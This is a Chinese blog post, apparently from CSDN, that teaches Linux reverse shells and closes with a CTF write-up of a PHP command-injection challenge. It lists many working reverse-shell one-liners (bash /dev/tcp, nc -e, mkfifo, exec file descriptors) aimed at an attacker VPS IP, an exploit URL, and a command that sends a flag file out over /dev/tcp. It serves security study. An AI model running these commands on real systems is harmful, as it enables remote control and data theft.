[CTF]-反弹shell[2]

最新推荐文章于 2024-06-26 20:58:55 发布
最新推荐文章于 2024-06-26 20:58:55 发布
阅读量1.6k 收藏 19
点赞数 4
分类专栏: CTF 文章标签: linux 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/noob0208/article/details/125001877
版权

[二]反弹shell的本质

开放端口(腾讯云,宝塔面板)

测试反弹shell 需要保证端口开放

打开腾讯云 --> 打开安全组 --> 添加规则

在这里插入图片描述

在这里插入图片描述

添加入站规则

在这里插入图片描述

完成之后–> 一键放通

在这里插入图片描述

然后进入宝塔面板

在这里插入图片描述

想放行什么端口就写端口号

我这里是2333

在这里插入图片描述

在这里插入图片描述

到这里2333端口就已经成功开放了

接下来就可以反弹shell

什么是反弹shell

reverse shell,就是控制端监听在某TCP/UDP端口,

被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shelltelnet

ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。

反弹shell的本质是什么

攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接

我们可以先以一个linux 下的反弹shell 的命令为例来看一下反弹shell 的命令都做了些什么,

掌握了反弹的本质,再多的方法其实只是换了包装而已

实验环境:

victim: 
	Kali Linux -------> 192.168.192.133
attacker:
	Ubuntu Linux ---> 101.34.32.151

bash

attacker机器上执行:

nc -lvp 2333
//出现nc: getnameinfo: Temporary failure in name resolution
//就加上 n 
nc -lvnp 2333

victim机器上执行:

bash -i >& /dev/tcp/101.34.32.151/2333 0>&1

在这里插入图片描述

在这里插入图片描述

可以看到在攻击机上出现了受害者机器的shell

解释一下这条命令具体的含义:

bash -i

  1. bash 是linux 的一个比较常见的shell,其实linux的shell还有很多,比如 sh、zsh、等,他们之间有着细小差别
  2. -i 这个参数表示的是产生交互式的shell

/dev/tcp/ip/port

/dev/tcp|udp/ip/port 这个文件是特别特殊的,

实际上可以将其看成一个设备(Linux下一切皆文件),其实如果你访问这个文件的位置他是不存在的,

如下图:

在这里插入图片描述

但是如果你在一方监听端口的情况下对这个文件进行读写,就能实现与监听端口的服务器的socket通信

实例1:

	victim:

在这里插入图片描述

	attacker:

在这里插入图片描述

实例2:

	attacker:

在这里插入图片描述

	victim:

在这里插入图片描述

然后再attacker上输入内容

在这里插入图片描述

然后victim上就会显示同样的内容

在这里插入图片描述

交互重定向

为了实现交互,我们需要把受害者交互式shell的输出重定向到攻击机上

在受害者机器上输入

bash -i > /dev/tcp/192.168.146.129/2333

在这里插入图片描述

如下图所示,任何在受害者机器上执行的指令都不会直接回显了,而是在攻击者机器上回显

在这里插入图片描述

在这里插入图片描述

但是这里有一个问题,攻击者没有能够实现对受害者的控制,攻击者执行的命令没法在受害者电脑上执行

于是我们似乎还需要一条这样的指令

bash -i < /dev/tcp/101.34.32.151/2333

在这里插入图片描述

这条指令的意思是将攻击者输入的命令输入给受害者的bash,自然就能执行了

在这里插入图片描述

在这里插入图片描述

现在我们需要将两条指令结合起来

(如果这条指令看不懂可以去看一下我上面提供的文章的链接再回来看这条指令):

bash -i > /dev/tcp/101.34.32.151/2333 0>&1

在这里插入图片描述

由这张示意图可以很清楚地看到,

输入0是由/dev/tcp/192.168.146.129/2333 输入的,也就是攻击机的输入,命令执行的结果1

输出/dev/tcp/192.168.156.129/2333上,这就形成了一个回路

实现了我们远程交互式shell 的功能

如下图所示,我在攻击机上输入 ifconfig,查看到的是受害者ip

也就是说我们目前已经基本完成了一个反弹shell 的功能

在这里插入图片描述

注意:
但是这里有一个问题,就是我们在受害者机器上依然能看到我们在攻击者机器中执行的指令 ,如下图所示,我们马上解决

在这里插入图片描述

>&、&>

现在我们解决一下前面的问题:

bash -i > /dev/tcp/192.168.146.129/2333 0>&1 2>&10''

在这里插入图片描述

可以看到命令并没有回显在受害者机器上,我们的目的达成了

在这里插入图片描述

当然我们也可以执行与之完全等价的指令

bash -i >& /dev/tcp/101.34.32.151/2333 0>&1

至此,我们的反弹shell的经典语句就分析完了,通过这条语句的分析我们能大致的了解反弹shell的本质

以后碰到其他的反弹shell 的语句也能用类似的分析方法区分析

甚至我们也可以自己举一反三创造更加绝妙的反弹shell 的语句

常见的反弹shell 的语句怎么理解

1

bash -i >& /dev/tcp/101.34.32.151/2333 0>&1


bash -i >& /dev/tcp/101.34.32.151/2333 0<&1

这里的唯一区别就是0>&10<&1

其实就是打开方式的不同,而对于这个文件描述符来讲并没有什么区别

2

bash -i >& /dev/tcp/192.168.146.129/2333 <&2

等价于

bash -i >& /dev/tcp/192.168.146.129/2333 0<&2

在这里插入图片描述

3

exec 5<>/dev/tcp/192.168.146.129/2333;cat <&5|while read line;do $line >&5 2>&1;done

解释:

exec 5<>/dev/tcp/192.168.146.129/2333

这一句将文件描述符5 重定向到了 /dev/tcp/192.168.146.129/2333 并且方式是读写方式

于是我们就能通过文件描述符对这个socket连接进行操作了

command|while read line do .....done

原句是下面

while read line
do
  #code
done < file

从文件中依次读取每一行,将其赋值给 line 变量

(当然这里变量可以很多,以空格分隔,这里我就举一个变量的例子,如果是一个变量的话,那么一整行都是它的了)

之后再在循环中对line进行操作

而现在我们不是从file 文件中输入了,我们使用管道符对攻击者机器上输入的命令依次执行

并将标准输出标准错误输出重定向到了文件描述符5,也就是攻击机上,实现交互式shell的功能。

与之完全类似的还有下面这条指令

0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196

4

nc -e 可以直接反弹shell

nc -e /bin/sh 101.34.32.151 2333

如果没有 -e 那可以参考下面

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.146.129 2333 >/tmp/f

简单的解释:
mkfifo 命令首先创建了一个管道cat 将管道里面的内容输出传递给/bin/shsh执行管道里的命令并将标准输出标准错误输出结果通过nc 传到该管道,由此形成了一个回路

类似的命令:

mknod backpipe p; nc 192.168.146.129 2333 0<backpipe | /bin/bash 1>backpipe 2>backpipe

结束

反弹shell方法很常见,但也要自己会构造

文件描述和重定向是基础

极客大挑战where_is_my_FUMO

题目

<?php
function chijou_kega_no_junnka($str) {
    $black_list = [">", ";", "|", "{", "}", "/", " "];
    return str_replace($black_list, "", $str);
}
if (isset($_GET['DATA'])) {
    $data = $_GET['DATA'];
    $addr = chijou_kega_no_junnka($data['ADDR']);
    $port = chijou_kega_no_junnka($data['PORT']);
    exec("bash -c \"bash -i < /dev/tcp/$addr/$port\"");
} else {
    highlight_file(__FILE__);
}

对题目传数组参数,执行到exec可以反弹shell

构造payload

http://1.14.102.22:8115/?DATA[ADDR]=101.34.32.151&DATA[PORT]=2333

这样就可以反弹shell到对应的ip端口

在服务器端执行

nc -lvvnp 2333

在这里插入图片描述

拿下服务器后发现没有回显

原因是题目中,bash反弹shell写法,只能将命令攻击机传到受害着,命令可以执行但是没有回显

bash -c \"bash -i < /dev/tcp/$addr/$port\

拿到无回显shell之后也就有两种方法,第一种就是再反弹 可回显交互式shell 到vps的其他端口

bash -i >& /dev/tcp/101.34.32.151/6666

在这里插入图片描述

在这里插入图片描述

监听端口,拿到shell,发现根目录flag.png

然后把文件转到服务器上

	本地:

nc -lvnp 2333 > test.png

	靶机:

cat /flag.png >& /dev/tcp/101.34.32.151/2333 0>&1

在这里插入图片描述

然后本地就会出现一个test.png

在这里插入图片描述

然后以base64读取图片

cat test.png | base64

有的显示的长度有限制 所以多次输出

cat /flag.png | base64 | tail -n +1|head -n 8000

cat /flag.png | base64 | tail -n +8001|head -n 8000
每次读8000行,读两次,然后base64转图片

在这里插入图片描述

以上就是自己学习反弹shell的全部内容 分为[1]和[2] 内容

感谢师傅看到这里

木拖把
关注
专栏目录
反弹shell以及常见的反弹Shell语句原理
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-31 511
什么是反弹shell?原词为reverse shell,含义如下 控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。 其本质就是实现客户端与服务端的互换 反弹shell利用原因 初学时我们不禁有这样的疑问,为什么我们要用反弹shell呢?我们时候利用反弹shell呢?解释如下 为什么要用反弹shell 这里不以CTF举例,以相对更真实一点的渗透过程来举例,比如你作为攻击方,成功向目标处上传了木马文件,可以执行一些语句,我们想获取一个可以直接操作主机的虚拟终端,这个时
靶机渗透训练——JIS-CTF-VulnUpload-CTF01
z7sz的博客
06-22 485
这是一篇关于JIS-CTF-VulnUpload-CTF01靶机训练的文章
Linux反弹shell(一)文件描述符与重定向
Hunt Counter
10-24 360
0X00 前言 由于在反弹shell的过程中有一些精简的语句一直没有弄明白,今天特意写文章总结这里面最难的文件描述符和重定向的部分。 0X01 文件描述符 linux文件描述符:可以理解为linux跟踪打开文件,而分配的一个数字,这个数字有点类似c语言操作文件时候的句柄,通过句柄就可以实现文件的读写操作。 当Linux启动的时候会默认打开三个文件描述符,分别是: 标准输入standard inpu...
反弹shell 纯干货版 --D--K--盾
最新发布
2301_81040377的博客
06-26 994
本文主要讲解我已知的CTF中对VPS的利用的教程模块,所以本篇文章将会持续更新并且有改动。
[CTF]反弹shell总结
cosmoslin的博客
11-11 4635
1 什么是反弹shell reverse shell,就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 2 为什么要反弹shell 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。
反弹Shell
夏日 の blog
03-26 984
说明:端口可任意,但要保持一致而且不能被占用,以下均为攻击机登录被攻击机 bash连接 攻击机器输入 nc -lvp 7777 被攻击机器输入bash -i >& /dev/tcp/攻击机ip/7777 0>&1 然后攻击机器就相当于登陆了了被攻击机器 curl连接 在攻击机根目录下创建shell.txt,内容为bash -i >& /dev/tc...
浅析CTF绕过字符数字构造shell
蚁景网安学院
12-14 3722
CTF中,虽然有很多文章有这方面的资料,但是相对来说比较零散,这里主要把自己学习和打ctf遇到的一些绕过字符数字构造shell梳理一下。
Struts2-052复现,并反弹Shell
Becktick的博客
03-31 1285
Struts2-052复现,并反弹Shell 技术无罪,请勿用于恶意用途 转载请注明出处! 测试机:kali linux,win10 工具:burp 靶机:cenOS7 测试机IP:192.168.213.136 靶机IP:192.168.213.138 环境: docker 一. 环境搭建 docker搭建可以参考这位小姐姐的文章: http://bbs.dark5.net/?thread-24...
CTF - 第二届“陇剑杯”网络安全大赛线上赛部分write up
08-26
CTF-第二届“陇剑杯”网络安全大赛线上赛部分write up 本篇文章将围绕第二届“陇剑杯”网络安全大赛线上赛的 Write-up 进行详细的讲解,从中可以学到许多实用的网络安全知识。 首先,我们来看一下第一个题目,黑客...
CTF-2021中国能源网络WEB题目全解
wulanlin的博客
12-31 1031
0x01 前言 在2021年10月15日的“中国能源网络安全大赛”,笔者对WEB题目进行了尝试,幸运的做出了所有题目。 感觉WEB的考点形形色色,其中有1道偏于黑盒测试的简单题目,4道是白盒审计类题目,还有一道是Python的反序列化题目,题目名称大致如下: 因为唯一的一道黑盒题目还是文件包含题目,所以笔者将题目源代码全部扒下来了,给大家提供复现环境。(flag自己创建)。 下面笔者将分享这次比赛的解题过程。 0x02 ezphp 这是一道很简单的题目,同时也被大家刷成了签到题。
CTF-普通用户提权
IT小学子的博客
05-03 3256
文章目录提权前提:1. 利用内核漏洞2. 利用明文root密码提权3. 利用定时计划任务4. 密码复用5. 利用zip提权 在我们拿下服务器web服务往往只是低权限用户,对于内网渗透,我们往往需要root权限,Linux系统提权包括使用溢出漏洞已及利用系统配置文件。 提权前提:   1.拿到低权限shell   2.被入侵机器上有nc,python,perl等常见linux下的工具  ...
De1ctf - shell shell shell记录
weixin_30376453的博客
08-08 352
虽然是N1CTF原题,但是自己没遇见过,还是做的题少,记录一下吧== 1.源码泄露,直接可以下到所有源码,然后代码审计到一处insert型注入: 这里直接带入insert里面,跟进去看看 insert函数对values进行正则替换,先调用get_columnsp 这里把数组分成以` , `连接的字符串并且以`反引号包在内,而正则则是匹配字符串中所有反引号之间的内容,将其取...
一天一道ctf 第57天(文件描述符 反弹shell
scrawman的博客
08-19 681
[网鼎杯 2020 白虎组]PicDown 这题目还挺怪的,?url=/flag直接读取是非预期解 正常一步一步做下来是先看/proc/self/cmdline,查看本地使用过的命令,然后/proc/self/cwd/app.py看源码 from flask import Flask, Response from flask import render_template from flask import request import os import urllib app = Flask(__n
ctf web中快速反弹
wssmiss的博客
03-25 597
**原文:**https://ciphersaw.me/2017/12/16/详解 CTF Web 中的快速反弹 POST 请求/ 原文作者:Cipher Saw 0x00 前言 在 CTF Web 的基础题中,经常出现一类题型:在 HTTP 响应头获取了一段有效期很短的 key 值后,需要将经过处理后的 key 值快速 POST 给服务器,若 key 值还在有效期内,则服务器返回最终的 flag...
反弹shell方法
Sea_Sand息禅
04-06 813
1、bash反弹shell kali ip:192.168.10.130 目标机上执行命令:bash -i >& /dev/tcp/192.168.10.130/8888 0>&1 kali机执行命令:nc -lvp 8888 bash -i:在本地打开一个bash终端 linux文件描述符:linux shell下有三种标准的文件描述符,分别如下: 0...
CTF-shell_exec-Wp
qq_28545703的博客
10-29 1486
CTF-shell_exec-Wp 题目是这样的,ping命令测试 查看html源代码看到一个tip 解题过程一 经过大量测试目的其实就是执行cat /flag 但是发现有过滤了空格,这里我们$IFS$9代替 我是利用echo curl http://xxxxx.com/1.php >a ,然后执行sh a这样拿shell的,需要绕过php 最终poc: #第一条,把vps的<?php system('cat /flag')>写进去a `echo$IFS$9curl$IFS$9112h
SECCON CTF 2017 Powerful_Shell
giantbranch的专栏
12-12 1070
打开一开始一堆变量赋值,而且很长 我们拖到最后,有个create执行脚本的东西,而且还是前面的变量 那我们用Write-Host输出这个变量 得到的是另一串powershell脚本 扣下来,其中下面这部分只是验证Host,我们并不需要,直接删掉 运行一下是弹钢琴的操作 那我们添加代码,输出被处理后的值 就图片上的字母,自己试就行 最终得出对应如下 ...
[BJDCTF 2nd]duangShell(swp源码泄露,反弹shell
qq_44657899的博客
05-17 793
做这道题之前还一直不知道反弹shell是怎么操作的,做完之后恍然大悟,刷题真香 首先题目中提示了.swp,应该是.swp源码泄露,然后试了试/index.php.swp毫无反应,看了wp之后才知道是/.index.php.swp。。。幸好不是比赛,不然简直被自己蠢死 然后下载下来,拖到kali里用命令vim -r index.php.swp恢复文件,源码: 看了看过滤,只过滤了cat,天真的我以为用tac就行了。。。结果事情远远没有这么简单,exec()函数是没有回显的,我还一直以为exec()和sys
CTF比赛时准备的一些shell命令
dfhz2014的博客
09-15 841
防御策略:sudo service apache2 start :set fileformat=unix1.写脚本关闭大部分服务,除了ssh 2.改root密码,禁用除了root之外的所有用户 sudo passwd root3.curl命令4.ssh 一秒开一秒关5.比赛开始就查看自己Linux,apache的版本,找到对应漏洞打上补丁 apache2ctl -...
ctf-qsnctf此地无银三百
02-20
ctf-qsnctf是一个CTF(Capture The Flag)比赛平台,它提供了一系列的网络安全挑战,旨在帮助参与者提升网络安全技能和解决问题的能力。在ctf-qsnctf平台上,参与者可以通过解决各种类型的题目来获取旗帜(flag),并提交给平台进行验证。 "此地无银三百"是ctf-qsnctf平台上的一道题目,它的名称可能是一个提示,暗示着解题的思路。具体的解题方法和答案我无法透露,因为这会破坏比赛的公平性和乐趣。如果你对这道题目感兴趣,我建议你在ctf-qsnctf平台上注册账号并参与比赛,通过自己的努力和思考来解决问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值